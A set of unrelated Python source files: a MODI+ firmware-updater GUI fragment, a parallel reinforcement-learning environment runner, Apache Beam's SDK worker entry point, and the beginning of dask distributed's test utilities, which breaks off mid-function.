run_task(self, modi_ports, firmware_version_info): self.firmware_updater = NetworkFirmwareMultiUpdater(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.module_update_list_form) self.firmware_updater.update_module_firmware(modi_ports, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_module_firmware([modi_ports[0]], firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.module_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.module_update_list_form.ui.exec_() def update_network_submodule_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.esp32_update_list_form.ui.show() return self.ui.update_network_submodule_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("ESP32 Firmware Updater has been initialized for esp update!") th.Thread( target=self.__click_motion, args=(1, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.esp32_update_list_form.ui.setWindowTitle("Update Network Submodules") self.esp32_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ESP32FirmwareMultiUploder(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.esp32_update_list_form) self.firmware_updater.update_firmware(modi_ports, False, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) 
self.firmware_updater.update_firmware([modi_ports[0]], False, firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.esp32_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.esp32_update_list_form.ui.exec_() def delete_user_code_button_clicked(self): button_start = time.time() if self.firmware_updater and self.firmware_updater.update_in_progress: if self.is_multi: self.esp32_update_list_form.ui.show() return self.ui.delete_user_code_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("ESP32 Firmware Updater has been initialized for esp interpreter update!") th.Thread( target=self.__click_motion, args=(2, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: raise Exception("No MODI+ port is connected") if self.is_multi: self.esp32_update_list_form.ui.setWindowTitle("Delete User Code") self.esp32_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ESP32FirmwareMultiUploder(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.esp32_update_list_form) self.firmware_updater.update_firmware(modi_ports, True, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_firmware([modi_ports[0]], True, firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.esp32_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.esp32_update_list_form.ui.exec_() def update_general_modules_button_clicked(self): button_start = time.time() if self.firmware_updater and 
self.firmware_updater.update_in_progress: if self.is_multi: self.module_update_list_form.ui.show() return self.ui.update_general_modules_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() print("Module Firmware Updater has been initialized for module update!") th.Thread( target=self.__click_motion, args=(3, button_start), daemon=True ).start() modi_ports = list_modi_serialports() if not modi_ports: self.__reset_ui(self.module_update_list_form) raise Exception("No MODI+ port is connected") if self.is_multi: self.module_update_list_form.ui.setWindowTitle("Update General Modules") self.module_update_list_form.reset_device_list() firmware_version_info = self.firmware_manage_form.get_config_firmware_version_info() def run_task(self, modi_ports, firmware_version_info): self.firmware_updater = ModuleFirmwareMultiUpdater(self.module_firmware_path) self.firmware_updater.set_task_end_callback(self.__reset_ui) if self.is_multi: self.firmware_updater.set_ui(self.ui, self.module_update_list_form) self.firmware_updater.update_module_firmware(modi_ports, firmware_version_info) else: self.firmware_updater.set_ui(self.ui, None) self.firmware_updater.update_module_firmware([modi_ports[0]], firmware_version_info) th.Thread( target=run_task, args=(self, modi_ports, firmware_version_info), daemon=True ).start() if self.is_multi: if is_raspberrypi(): self.module_update_list_form.ui.setWindowState(Qt.WindowMaximized) self.module_update_list_form.ui.exec_() def manage_firmware_version_button_clicked(self): button_start = time.time() self.ui.manage_firmware_version_button.setStyleSheet(f"border-image: url({self.pressed_path}); color: black;") self.ui.console.clear() th.Thread( target=self.__click_motion, args=(4, button_start), daemon=True ).start() self.firmware_manage_form.refresh_firmware_info() self.firmware_manage_form.ui.exec_() self.__reset_ui() def devmode_button_clicked(self): button_start = time.time() 
self.ui.devmode_button.setStyleSheet(f"border-image: url({self.language_frame_pressed_path}); font-size: 13px; color: black;") th.Thread( target=self.__click_motion, args=(5, button_start), daemon=True ).start() self.console = not self.console self.refresh_console() def translate_button_clicked(self): button_start = time.time() self.ui.translate_button.setStyleSheet(f"border-image: url({self.language_frame_pressed_path}); font-size: 13px; color: black;") th.Thread( target=self.__click_motion, args=(6, button_start), daemon=True ).start() self.button_in_english = not self.button_in_english self.ui.is_english = not self.ui.is_english self.refresh_button_text() def refresh_console(self): if is_raspberrypi(): self.ui.console.hide() self.ui.manage_firmware_version_button.setVisible(False) self.ui.setWindowState(Qt.WindowMaximized) else: if self.console: self.ui.console.show() self.ui.manage_firmware_version_button.setVisible(True) else: self.ui.console.hide() self.ui.manage_firmware_version_button.setVisible(False) self.ui.adjustSize() def refresh_button_text(self): appropriate_translation = (self.button_en if self.button_in_english else self.button_kr) for i, button in enumerate(self.buttons): button.setText(appropriate_translation[i]) def check_module_firmware(self): check_success = True firmware_list = self.firmware_manage_form.check_firmware() if len(firmware_list) == 0: download_success = self.firmware_manage_form.download_firmware() if download_success: refresh_success = self.firmware_manage_form.refresh_firmware_info() if refresh_success: self.firmware_manage_form.apply_firmware(show_message=False) else: check_success = False else: check_success = False else: refresh_success = self.firmware_manage_form.refresh_firmware_info() self.firmware_manage_form.apply_firmware(show_message=False) if not check_success: raise Exception("download firmware first,\n and select firmware version") else: self.firmware_manage_form.check_firmware_version_update() def 
check_app_update(self): try: import requests response = requests.get("https://api.github.com/repos/LUXROBO/modi2-firmware-updater/releases/latest").json() current_version = self.version_info latest_version = response["name"] import platform download_url = response["html_url"] for asset in response["assets"]: file_name = asset["name"] if not "Multi" in file_name and not "multi" in file_name: # single updater if platform.system() == "Darwin" and ".dmg" in file_name: download_url = asset["browser_download_url"] elif platform.system() == "Windows" and ".exe" in file_name: download_url = asset["browser_download_url"] from packaging import version if version.parse(latest_version) > version.parse(current_version): print(f"need to update to {latest_version}\n{download_url}") msg = QMessageBox() msg.setWindowIcon(QtGui.QIcon(os.path.join(self.component_path, "network_module.ico"))) msg.setWindowTitle("App update") msg.setStandardButtons(QMessageBox.Ok) msg.setIcon(QMessageBox.Icon.Information) msg.setText(f"need to update to {latest_version}") msg.setDetailedText(download_url) msg.exec_() import webbrowser webbrowser.open(download_url, new=0, autoraise=True) except: pass # # Helper functions # def __popup_excepthook(self, exctype, value, traceback): self.__excepthook(exctype, value, traceback) if self.is_popup: return self.popup = PopupMessageBox(self.ui, level="error") self.popup.setInformativeText(str(value)) self.popup.setDetailedText(str(tb.extract_tb(traceback))) self.is_popup = True def __popup_thread_excepthook(self, err_msg): if err_msg.exc_type in self.err_list: return self.err_list.append(err_msg.exc_type) self.stream.thread_error.connect(self.__thread_error_hook) self.stream.thread_error.emit(err_msg) @pyqtSlot(object) def __thread_error_hook(self, err_msg): self.__popup_excepthook(err_msg.exc_type, err_msg.exc_value, err_msg.exc_traceback) def __click_motion(self, button_type, start_time): # Busy wait for 0.2 seconds while time.time() - start_time < 0.2: pass if 
button_type in [5, 6]: self.buttons[button_type].setStyleSheet(f"border-image: url({self.language_frame_path}); font-size: 13px; color: black;") else: self.buttons[button_type].setStyleSheet(f"border-image: url({self.active_path}); color: black;") for i, q_button in enumerate(self.buttons): if i in [button_type, 5, 6]: continue q_button.setStyleSheet(f"border-image: url({self.inactive_path}); color: black;") q_button.setEnabled(False) def __reset_ui(self, list_ui = None): for i, q_button in enumerate(self.buttons): if i in [5, 6]: continue q_button.setStyleSheet(f"border-image: url({self.active_path}); color: black;") q_button.setEnabled(True) # refresh language self.refresh_button_text() # reset list ui if list_ui == self.module_update_list_form: self.module_update_list_form.ui.close_button.setEnabled(True) self.module_update_list_form.total_status_signal.emit("Complete") self.module_update_list_form.total_progress_signal.emit(100) elif list_ui == self.esp32_update_list_form: self.esp32_update_list_form.ui.close_button.setEnabled(True) self.esp32_update_list_form.total_status_signal.emit("Complete") def __append_text_line(self, line): self.ui.console.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.MoveAnchor) self.ui.console.moveCursor(QtGui.QTextCursor.StartOfLine, QtGui.QTextCursor.MoveAnchor) self.ui.console.moveCursor(QtGui.QTextCursor.End, QtGui.QTextCursor.KeepAnchor) # Remove new line character if current line represents update_progress if self.__is_update_progress_line(line): self.ui.console.textCursor().removeSelectedText() self.ui.console.textCursor().deletePreviousChar() # Display user text input self.ui.console.moveCursor(QtGui.QTextCursor.End) self.ui.console.insertPlainText(line) @staticmethod def __is_update_progress_line(line): return line.startswith("\r")
parallel_runner.py
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th


# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py


class ParallelRunner:
    """Runs ``batch_size_run`` environment instances in parallel subprocesses
    and collects full episodes into an EpisodeBatch.

    Each subprocess executes :func:`env_worker` and is driven over a
    ``multiprocessing.Pipe`` with small (command, data) messages.
    """

    def __init__(self, args, logger):
        self.args = args
        self.logger = logger
        self.batch_size = self.args.batch_size_run

        # Make subprocesses for the envs
        self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
        env_fn = env_REGISTRY[self.args.env]
        env_args = [self.args.env_args.copy() for _ in range(self.batch_size)]
        for i in range(self.batch_size):
            # Give every parallel environment a distinct seed.
            env_args[i]["seed"] += i

        # env_fn is wrapped in CloudpickleWrapper because partials with
        # arbitrary env constructors may not be plain-picklable.
        self.ps = [Process(target=env_worker,
                           args=(worker_conn, CloudpickleWrapper(partial(env_fn, **env_arg))))
                   for env_arg, worker_conn in zip(env_args, self.worker_conns)]

        for p in self.ps:
            # Daemonize so workers die with the main process.
            p.daemon = True
            p.start()

        # All envs share the same static info; ask the first worker only.
        self.parent_conns[0].send(("get_env_info", None))
        self.env_info = self.parent_conns[0].recv()
        self.episode_limit = self.env_info["episode_limit"]

        self.t = 0      # timestep inside the current episode batch
        self.t_env = 0  # cumulative training environment steps

        self.train_returns = []
        self.test_returns = []
        self.train_stats = {}
        self.test_stats = {}

        # Large negative sentinel so the first training log fires immediately.
        self.log_train_stats_t = -100000

    def setup(self, scheme, groups, preprocess, mac):
        """Store the batch factory and the multi-agent controller.

        ``episode_limit + 1`` slots are allocated so the final (terminal)
        pre-transition data also fits in the batch.
        """
        self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size,
                                 self.episode_limit + 1,
                                 preprocess=preprocess, device=self.args.device)
        self.mac = mac
        self.scheme = scheme
        self.groups = groups
        self.preprocess = preprocess

    def get_env_info(self):
        """Return the (shared) environment info dict obtained at startup."""
        return self.env_info

    def save_replay(self):
        # Not supported for the parallel runner.
        pass

    def close_env(self):
        """Ask every worker subprocess to close its environment and exit."""
        for parent_conn in self.parent_conns:
            parent_conn.send(("close", None))

    def reset(self):
        """Start a fresh EpisodeBatch and reset all parallel envs."""
        self.batch = self.new_batch()

        # Reset the envs
        for parent_conn in self.parent_conns:
            parent_conn.send(("reset", None))

        pre_transition_data = {
            "state": [],
            "avail_actions": [],
            "obs": []
        }
        # Get the obs, state and avail_actions back
        for parent_conn in self.parent_conns:
            data = parent_conn.recv()
            pre_transition_data["state"].append(data["state"])
            pre_transition_data["avail_actions"].append(data["avail_actions"])
            pre_transition_data["obs"].append(data["obs"])

        self.batch.update(pre_transition_data, ts=0)

        self.t = 0
        self.env_steps_this_run = 0

    def run(self, test_mode=False):
        """Run one batch of episodes to termination and return the EpisodeBatch.

        Also accumulates return/length statistics and logs them periodically
        (or after a fixed number of test episodes when ``test_mode`` is set).
        """
        self.reset()

        all_terminated = False
        episode_returns = [0 for _ in range(self.batch_size)]
        episode_lengths = [0 for _ in range(self.batch_size)]
        self.mac.init_hidden(batch_size=self.batch_size)
        terminated = [False for _ in range(self.batch_size)]
        envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
        final_env_infos = []  # may store extra stats like battle won. this is filled in ORDER OF TERMINATION

        while True:
            # Pass the entire batch of experiences up till now to the agents
            # Receive the actions for each agent at this timestep in a batch for each un-terminated env
            actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env,
                                              bs=envs_not_terminated, test_mode=test_mode)
            cpu_actions = actions.to("cpu").numpy()

            # Update the actions taken
            actions_chosen = {
                "actions": actions.unsqueeze(1)
            }
            self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)

            # Send actions to each env
            action_idx = 0
            for idx, parent_conn in enumerate(self.parent_conns):
                if idx in envs_not_terminated:  # We produced actions for this env
                    if not terminated[idx]:  # Only send the actions to the env if it hasn't terminated
                        parent_conn.send(("step", cpu_actions[action_idx]))
                    action_idx += 1  # actions is not a list over every env

            # Update envs_not_terminated
            envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
            all_terminated = all(terminated)
            if all_terminated:
                break

            # Post step data we will insert for the current timestep
            post_transition_data = {
                "reward": [],
                "terminated": []
            }
            # Data for the next step we will insert in order to select an action
            pre_transition_data = {
                "state": [],
                "avail_actions": [],
                "obs": []
            }

            # Receive data back for each unterminated env
            for idx, parent_conn in enumerate(self.parent_conns):
                if not terminated[idx]:
                    data = parent_conn.recv()
                    # Remaining data for this current timestep
                    post_transition_data["reward"].append((data["reward"],))

                    episode_returns[idx] += data["reward"]
                    episode_lengths[idx] += 1
                    if not test_mode:
                        self.env_steps_this_run += 1

                    env_terminated = False
                    if data["terminated"]:
                        final_env_infos.append(data["info"])
                    # An episode cut off by the time limit is not marked as a
                    # "real" termination in the batch (for bootstrapping).
                    if data["terminated"] and not data["info"].get("episode_limit", False):
                        env_terminated = True
                    terminated[idx] = data["terminated"]
                    post_transition_data["terminated"].append((env_terminated,))

                    # Data for the next timestep needed to select an action
                    pre_transition_data["state"].append(data["state"])
                    pre_transition_data["avail_actions"].append(data["avail_actions"])
                    pre_transition_data["obs"].append(data["obs"])

            # Add post_transiton data into the batch
            self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)

            # Move onto the next timestep
            self.t += 1

            # Add the pre-transition data
            self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)

        if not test_mode:
            self.t_env += self.env_steps_this_run

        # Get stats back for each env
        for parent_conn in self.parent_conns:
            parent_conn.send(("get_stats", None))

        env_stats = []
        for parent_conn in self.parent_conns:
            env_stat = parent_conn.recv()
            env_stats.append(env_stat)

        cur_stats = self.test_stats if test_mode else self.train_stats
        cur_returns = self.test_returns if test_mode else self.train_returns
        log_prefix = "test_" if test_mode else ""
        # Sum every stat key seen either in the running stats or in any
        # terminal env info (missing keys count as 0).
        infos = [cur_stats] + final_env_infos
        cur_stats.update({k: sum(d.get(k, 0) for d in infos)
                          for k in set.union(*[set(d) for d in infos])})
        cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
        cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)

        cur_returns.extend(episode_returns)

        n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
        if test_mode and (len(self.test_returns) == n_test_runs):
            self._log(cur_returns, cur_stats, log_prefix)
        elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
            self._log(cur_returns, cur_stats, log_prefix)
            if hasattr(self.mac.action_selector, "epsilon"):
                self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
            self.log_train_stats_t = self.t_env

        return self.batch

    def _log(self, returns, stats, prefix):
        """Log mean/std of returns and per-episode means of stats, then clear both."""
        self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
        self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
        returns.clear()

        for k, v in stats.items():
            if k != "n_episodes":
                self.logger.log_stat(prefix + k + "_mean", v / stats["n_episodes"], self.t_env)
        stats.clear()


def env_worker(remote, env_fn):
    """Subprocess entry point: serve (command, data) requests over *remote*.

    Commands: "step", "reset", "close", "get_env_info", "get_stats".
    """
    # Make environment
    env = env_fn.x()
    while True:
        cmd, data = remote.recv()
        if cmd == "step":
            actions = data
            # Take a step in the environment
            reward, terminated, env_info = env.step(actions)
            # Return the observations, avail_actions and state to make the next action
            state = env.get_state()
            avail_actions = env.get_avail_actions()
            obs = env.get_obs()
            remote.send({
                # Data for the next timestep needed to pick an action
                "state": state,
                "avail_actions": avail_actions,
                "obs": obs,
                # Rest of the data for the current timestep
                "reward": reward,
                "terminated": terminated,
                "info": env_info
            })
        elif cmd == "reset":
            env.reset()
            remote.send({
                "state": env.get_state(),
                "avail_actions": env.get_avail_actions(),
                "obs": env.get_obs()
            })
        elif cmd == "close":
            env.close()
            remote.close()
            break
        elif cmd == "get_env_info":
            remote.send(env.get_env_info())
        elif cmd == "get_stats":
            remote.send(env.get_stats())
        else:
            raise NotImplementedError


class CloudpickleWrapper():
    """
    Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
    """

    def __init__(self, x):
        self.x = x

    def __getstate__(self):
        import cloudpickle
        return cloudpickle.dumps(self.x)

    def __setstate__(self, ob):
        # Plain pickle can load cloudpickle-produced bytes.
        import pickle
        self.x = pickle.loads(ob)
sdk_worker_main.py
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """SDK Fn Harness entry point.""" from __future__ import absolute_import import http.server import json import logging import os import re import sys import threading import traceback from builtins import object from google.protobuf import text_format from apache_beam.internal import pickler from apache_beam.options.pipeline_options import DebugOptions from apache_beam.options.pipeline_options import PipelineOptions from apache_beam.options.pipeline_options import ProfilingOptions from apache_beam.portability.api import endpoints_pb2 from apache_beam.runners.internal import names from apache_beam.runners.worker.log_handler import FnApiLogRecordHandler from apache_beam.runners.worker.sdk_worker import SdkHarness from apache_beam.utils import profiler # This module is experimental. No backwards-compatibility guarantees. 
class StatusServer(object):
  """Serves stack traces of all live threads over plain HTTP, for debugging."""

  @classmethod
  def get_thread_dump(cls):
    """Return a list of text lines: a header plus stack trace per thread."""
    lines = []
    frames = sys._current_frames()  # pylint: disable=protected-access
    for t in threading.enumerate():
      lines.append('--- Thread #%s name: %s ---\n' % (t.ident, t.name))
      lines.append(''.join(traceback.format_stack(frames[t.ident])))
    return lines

  def start(self, status_http_port=0):
    """Executes the serving loop for the status server.

    Args:
      status_http_port(int): Binding port for the debug server.
        Default is 0 which means any free unsecured port
    """

    class StatusHttpHandler(http.server.BaseHTTPRequestHandler):
      """HTTP handler for serving stacktraces of all threads."""

      def do_GET(self):  # pylint: disable=invalid-name
        """Return all thread stacktraces information for GET request."""
        self.send_response(200)
        self.send_header('Content-Type', 'text/plain')
        self.end_headers()
        for line in StatusServer.get_thread_dump():
          self.wfile.write(line.encode('utf-8'))

      def log_message(self, f, *args):
        """Do not log any messages."""
        pass

    # Keep a reference on self so the server can be inspected/shut down later.
    self.httpd = httpd = http.server.HTTPServer(
        ('localhost', status_http_port), StatusHttpHandler)
    logging.info('Status HTTP server running at %s:%s', httpd.server_name,
                 httpd.server_port)
    httpd.serve_forever()  # blocks; intended to run on a daemon thread


def main(unused_argv):
  """Main entry point for SDK Fn Harness."""
  if 'LOGGING_API_SERVICE_DESCRIPTOR' in os.environ:
    try:
      logging_service_descriptor = endpoints_pb2.ApiServiceDescriptor()
      text_format.Merge(os.environ['LOGGING_API_SERVICE_DESCRIPTOR'],
                        logging_service_descriptor)

      # Send all logs to the runner.
      fn_log_handler = FnApiLogRecordHandler(logging_service_descriptor)
      # TODO(BEAM-5468): This should be picked up from pipeline options.
      logging.getLogger().setLevel(logging.INFO)
      logging.getLogger().addHandler(fn_log_handler)
      logging.info('Logging handler created.')
    except Exception:
      # Best effort: the harness still runs without runner-side logging.
      logging.error("Failed to set up logging handler, continuing without.",
                    exc_info=True)
      fn_log_handler = None
  else:
    fn_log_handler = None

  # Start status HTTP server thread.
  thread = threading.Thread(name='status_http_server',
                            target=StatusServer().start)
  thread.daemon = True
  # NOTE(review): this overrides the name given in the constructor above, and
  # Thread.setName is deprecated in favor of the ``name`` attribute — confirm
  # which name ('status_http_server' vs 'status-server-demon') is intended.
  thread.setName('status-server-demon')
  thread.start()

  if 'PIPELINE_OPTIONS' in os.environ:
    sdk_pipeline_options = _parse_pipeline_options(
        os.environ['PIPELINE_OPTIONS'])
  else:
    sdk_pipeline_options = PipelineOptions.from_dictionary({})

  if 'SEMI_PERSISTENT_DIRECTORY' in os.environ:
    semi_persistent_directory = os.environ['SEMI_PERSISTENT_DIRECTORY']
  else:
    semi_persistent_directory = None

  logging.info('semi_persistent_directory: %s', semi_persistent_directory)

  _worker_id = os.environ.get('WORKER_ID', None)

  try:
    _load_main_session(semi_persistent_directory)
  except Exception:  # pylint: disable=broad-except
    # Loading the pickled main session is best effort; log and continue.
    exception_details = traceback.format_exc()
    logging.error(
        'Could not load main session: %s', exception_details, exc_info=True)

  try:
    logging.info('Python sdk harness started with pipeline_options: %s',
                 sdk_pipeline_options.get_all_options(drop_default=True))
    service_descriptor = endpoints_pb2.ApiServiceDescriptor()
    text_format.Merge(os.environ['CONTROL_API_SERVICE_DESCRIPTOR'],
                      service_descriptor)
    # TODO(robertwb): Support credentials.
    assert not service_descriptor.oauth2_client_credentials_grant.url
    SdkHarness(
        control_address=service_descriptor.url,
        worker_count=_get_worker_count(sdk_pipeline_options),
        worker_id=_worker_id,
        profiler_factory=profiler.Profile.factory_from_options(
            sdk_pipeline_options.view_as(ProfilingOptions))
    ).run()
    logging.info('Python sdk harness exiting.')
  except:  # pylint: disable=broad-except
    logging.exception('Python sdk harness failed: ')
    raise
  finally:
    if fn_log_handler:
      fn_log_handler.close()


def _parse_pipeline_options(options_json):
  """Parse the PIPELINE_OPTIONS JSON blob into a PipelineOptions object."""
  options = json.loads(options_json)
  # Check the options field first for backward compatibility.
  if 'options' in options:
    return PipelineOptions.from_dictionary(options.get('options'))
  else:
    # Remove extra urn part from the key.
    portable_option_regex = r'^beam:option:(?P<key>.*):v1$'
    return PipelineOptions.from_dictionary({
        re.match(portable_option_regex, k).group('key')
        if re.match(portable_option_regex, k) else k: v
        for k, v in options.items()
    })


def _get_worker_count(pipeline_options):
  """Extract worker count from the pipeline_options.

  This defines how many SdkWorkers will be started in this Python process.
  And each SdkWorker will have its own thread to process data. Name of the
  experimental parameter is 'worker_threads'
  Example Usage in the Command Line:
    --experimental worker_threads=1

  Note: worker_threads is an experimental flag and might not be available in
  future releases.

  Returns:
    an int containing the worker_threads to use. Default is 12
  """
  experiments = pipeline_options.view_as(DebugOptions).experiments

  experiments = experiments if experiments else []

  for experiment in experiments:
    # There should only be 1 match so returning from the loop
    if re.match(r'worker_threads=', experiment):
      return int(
          re.match(r'worker_threads=(?P<worker_threads>.*)',
                   experiment).group('worker_threads'))

  return 12


def _load_main_session(semi_persistent_directory):
  """Loads a pickled main session from the path specified."""
  if semi_persistent_directory:
    session_file = os.path.join(semi_persistent_directory, 'staged',
                                names.PICKLED_MAIN_SESSION_FILE)
    if os.path.isfile(session_file):
      pickler.load_session(session_file)
    else:
      logging.warning(
          'No session file found: %s. Functions defined in __main__ '
          '(interactive session) may fail.', session_file)
  else:
    logging.warning(
        'No semi_persistent_directory found: Functions defined in __main__ '
        '(interactive session) may fail.')


if __name__ == '__main__':
  main(sys.argv)
utils_test.py
import asyncio
import collections
import copy
import functools
import gc
import inspect
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import warnings
import weakref
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from time import sleep

from distributed.scheduler import Scheduler

# ssl is optional in some builds; tests that need it check for None.
try:
    import ssl
except ImportError:
    ssl = None

import pytest
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop

import dask

from . import system
from .client import Client, _global_clients, default_client
from .comm import Comm
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
    DequeHandler,
    TimeoutError,
    _offload_executor,
    get_ip,
    get_ipv6,
    iscoroutinefunction,
    log_errors,
    mp_context,
    reset_logger_locks,
    sync,
    thread_state,
)
from .worker import Worker

try:
    import dask.array  # register config
except ImportError:
    pass

logger = logging.getLogger(__name__)

# Snapshot of all logger levels at import time, so tests can restore them.
logging_levels = {
    name: logger.level
    for name, logger in logging.root.manager.loggerDict.items()
    if isinstance(logger, logging.Logger)
}

_TEST_TIMEOUT = 30

_offload_executor.submit(lambda: None).result()  # create thread during import


@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
    """A temp .py file whose execution succeeds."""
    local_file = tmpdir_factory.mktemp("data").join("file.py")
    local_file.write("print('hello world!')")
    return local_file


@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
    """A temp script that creates a Client against a fixed local address."""
    local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
    lines = (
        "from distributed import Client",
        "e = Client('127.0.0.1:8989')",
        "print(e)",
    )
    local_file.write("\n".join(lines))
    return local_file


@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
    """A temp .py file that raises (NameError) when executed."""
    local_file = tmpdir_factory.mktemp("data").join("file.py")
    local_file.write("a+1")
    return local_file


async def cleanup_global_workers():
    """Close every Worker instance still tracked on the class."""
    for worker in Worker._instances:
        await worker.close(report=False, executor_wait=False)


@pytest.fixture
def loop():
    """A fresh IOLoop whose start() is patched so teardown can wait for stop."""
    with check_instances():
        with pristine_loop() as loop:
            # Monkey-patch IOLoop.start to wait for loop stop
            orig_start = loop.start
            is_stopped = threading.Event()
            is_stopped.set()

            def start():
                is_stopped.clear()
                try:
                    orig_start()
                finally:
                    is_stopped.set()

            loop.start = start

            yield loop

            # Stop the loop in case it's still running
            try:
                sync(loop, cleanup_global_workers, callback_timeout=0.500)
                loop.add_callback(loop.stop)
            except RuntimeError as e:
                if not re.match("IOLoop is clos(ed|ing)", str(e)):
                    raise
            except TimeoutError:
                pass
            else:
                is_stopped.wait()


@pytest.fixture
def loop_in_thread():
    """A pristine IOLoop running on a background daemon thread."""
    with pristine_loop() as loop:
        thread = threading.Thread(target=loop.start, name="test IOLoop")
        thread.daemon = True
        thread.start()
        loop_started = threading.Event()
        loop.add_callback(loop_started.set)
        loop_started.wait()
        yield loop
        loop.add_callback(loop.stop)
        thread.join(timeout=5)


@pytest.fixture
def zmq_ctx():
    """A shared pyzmq context, destroyed without lingering at teardown."""
    import zmq

    ctx = zmq.Context.instance()
    yield ctx
    ctx.destroy(linger=0)


@contextmanager
def pristine_loop():
    """Yield a brand-new current IOLoop, closing it and clearing state after."""
    IOLoop.clear_instance()
    IOLoop.clear_current()
    loop = IOLoop()
    loop.make_current()
    assert IOLoop.current() is loop
    try:
        yield loop
    finally:
        try:
            loop.close(all_fds=True)
        except (KeyError, ValueError):
            pass
        IOLoop.clear_instance()
        IOLoop.clear_current()


@contextmanager
def mock_ipython():
    """Patch IPython.get_ipython with a Mock shell; clean client cache after."""
    from unittest import mock
    from distributed._ipython_utils import remote_magic

    ip = mock.Mock()
    ip.user_ns = {}
    ip.kernel = None

    def get_ip():
        return ip

    with mock.patch("IPython.get_ipython", get_ip), mock.patch(
        "distributed._ipython_utils.get_ipython", get_ip
    ):
        yield ip
    # cleanup remote_magic client cache
    for kc in remote_magic._clients.values():
        kc.stop_channels()
    remote_magic._clients.clear()


original_config = copy.deepcopy(dask.config.config)


def reset_config():
    """Restore dask.config to its import-time snapshot."""
    dask.config.config.clear()
    dask.config.config.update(copy.deepcopy(original_config))


def nodebug(func):
    """
    A decorator to disable debug facilities during timing-sensitive tests.
    Warning: this doesn't affect already created IOLoops.
    """

    @functools.wraps(func)
    def wrapped(*args, **kwargs):
        old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
        if old_asyncio_debug is not None:
            del os.environ["PYTHONASYNCIODEBUG"]
        try:
            return func(*args, **kwargs)
        finally:
            if old_asyncio_debug is not None:
                os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug

    return wrapped


def nodebug_setup_module(module):
    """
    A setup_module() that you can install in a test module to disable
    debug facilities.
    """
    module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
    if module._old_asyncio_debug is not None:
